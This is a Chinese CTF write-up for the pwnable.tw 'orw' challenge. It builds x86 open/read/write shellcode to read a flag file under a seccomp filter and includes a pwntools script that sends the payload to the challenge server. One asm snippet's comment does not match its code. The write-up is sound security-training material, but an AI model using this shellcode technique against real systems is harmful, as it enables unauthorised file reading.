pwnable.tw orw 例题

这里用 pwnable.tw 网站上的 orw 例题来讲解 orw 的用法:这里给出 flag 在/home/orw/flag 文件下

1772118301706-a5d11716-29ad-48c8-aa38-d99df8b10a6a.png 1772091409712-d0f33bc4-672b-476b-9808-dda9742724dc.png

三连获取基本信息:32 位开启 canary,程序基本流程是输入字符串。看一下 IDA 的情况:1772091503765-c0f35445-5824-4179-aa62-03a01bb666ce.png

找到 main 函数,发现一开始执行了 orw_seccomp() 函数,是 orw 题目,查一下系统调用:

1772091360250-3792f4fd-5eb3-4af8-ba32-90e04ece9429.png

目前发现我们可以利用的有 open,read,write ,这三个系统调用已经足够我们获取 flag 了。

这里 read 就是一个非常浅显的栈溢出漏洞,直接往里面填写东西就可以了。由于orw_seccomp()保护,我们需要编写相应的汇编代码去获取 flag:

  1. open:打开文件 sys_open(const char __user *filename, int flags, int mode)
  2. read:读取文件内容 sys_read(unsigned int fd, char __user * buf, size_t count)
  3. write:将读取到的内容写入到标准输出 sys_write(unsigned int, fd, const char __user *, buf, size_t, count))
  4. 首先我们需要通过 open 函数来打开 flag 文件:内核中是由系统调用sys_open()函数完成
1
2
3
4
5
6
7
8
9
10
11
# 通过提示我们知道flag在home/orw/flag目录下:
sys_open(file,0,0);

    push 0x00006761     # /home/orw/flag 0x2f 0x68 0x6f 0x6d 0x65 0x2f 0x6f 0x72 0x77 0x2f 0x66 0x6c 0x61 0x67 0x00
    push 0x6c662f77
    push 0x726f2f65
    push 0x6d6f682f
    mov ebx, esp        # esp此时指向栈顶,栈顶是刚压入的字符串 ebx传入的参数表示要打开的文件路径
    xor ecx, ecx        # ecx = 0 只读
    mov eax, 5          # eax = sys_open
    int 0x80
  1. 利用read函数读取文件中的数据
1
2
3
4
5
6
7
sys_read(3,file,100);

    mov eax, 3         # eax = sys_read
    mov ebx, eax       # 如果sys_open成功打开文件,eax=3,执行这行后ebx=3,表示要读取文件描述符为 3 的文件。
    mov ecx, esp       # 把读取到的数据存到栈顶这个位置,因为栈顶空间一定是充足可写的
    mov edx, 100       # size = 100
    int 0x80
  1. 利用write函数将文件中的数据打印到屏幕上
1
2
3
4
5
6
sys_write(1,file,size);

    mov edx, eax # eax会返回实际读取到的字节数,这里edx指的是读取大小,读取的就是实际的字节大小
    mov ebx, 1   # 1:标准输出到屏幕
    mov eax, 4   # eax = sys_write
    int 0x80
  1. exit(0) >> 可要可不要
1
2
3
4
sys_exit(0)
    xor ebx, ebx    # ebx = 0
    mov eax, 1      # eax = 1 sys_exit()
    int 0x80

剩下的就是传入 shellcode 了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import *

context(os='linux', arch='i386', log_level='debug')

elf = ELF('./orw')

# io = process(elf.path)
# io = gdb.debug(elf.path, "b main")
io = remote("chall.pwnable.tw", 10001)

io.recv()

shellcode = asm("""
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx
             
    push 0x00006761 
    push 0x6c662f77
    push 0x726f2f65
    push 0x6d6f682f
    mov ebx, esp
    xor ecx, ecx
    mov eax, 5
    int 0x80

    mov ebx, eax
    mov ecx, esp
    mov edx, 100
    mov eax, 3
    int 0x80

    mov edx, eax
    mov ebx, 1
    mov eax, 4
    int 0x80

    xor ebx, ebx
    mov eax, 1
    int 0x80
""")

io.send(shellcode)

io.recv()

1772121140483-e2eeb0a4-a9ee-4269-b10f-2a91bdb7f04e.png

更新: 2026-03-19 10:23:41
原文: https://www.yuque.com/idcm/wnemg9/bggcgc4grxz3tatw